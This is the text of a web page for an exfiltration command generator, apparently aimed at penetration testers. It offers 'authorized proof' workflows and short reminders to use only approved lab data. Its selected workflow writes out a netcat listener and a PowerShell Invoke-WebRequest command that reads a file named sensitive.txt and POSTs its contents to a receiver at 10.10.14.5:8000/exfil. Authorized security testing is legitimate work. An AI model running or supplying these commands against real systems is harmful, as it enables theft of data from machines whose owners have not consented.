Data Exfiltration Generator
Build authorized data movement proof workflows, tune receiver variables, copy listener and target-side commands, and capture report-ready notes.
Workbench mode
Build authorized proof workflows with receiver setup, validation, copy actions, and report-ready notes.
Selected: HTTP6 visible
Proof variables
Only use approved lab data and receiver infrastructure covered by the assessment rules of engagement.
Filter techniques
Selected details
HTTP POST proof for Windows labs with straightforward listener setup.
OS: windowsSpeed: fastSignal: lowDependency: PowerShell
Technique library
6 matchesValidation and guardrails
- Use synthetic or approved test data only; avoid moving real sensitive data during proof collection.
Recent copies
Copied commands will appear here for quick reuse during the current browser session.
Selected workflow
PowerShell Invoke-WebRequest
HTTP - PowerShell
1. Receiver setup
nc -lvnp 8000 > data.txt
2. Target-side proof command
$data = Get-Content ".\sensitive.txt" -Raw
Invoke-WebRequest -Uri "http://10.10.14.5:8000/exfil" -Method POST -Body $data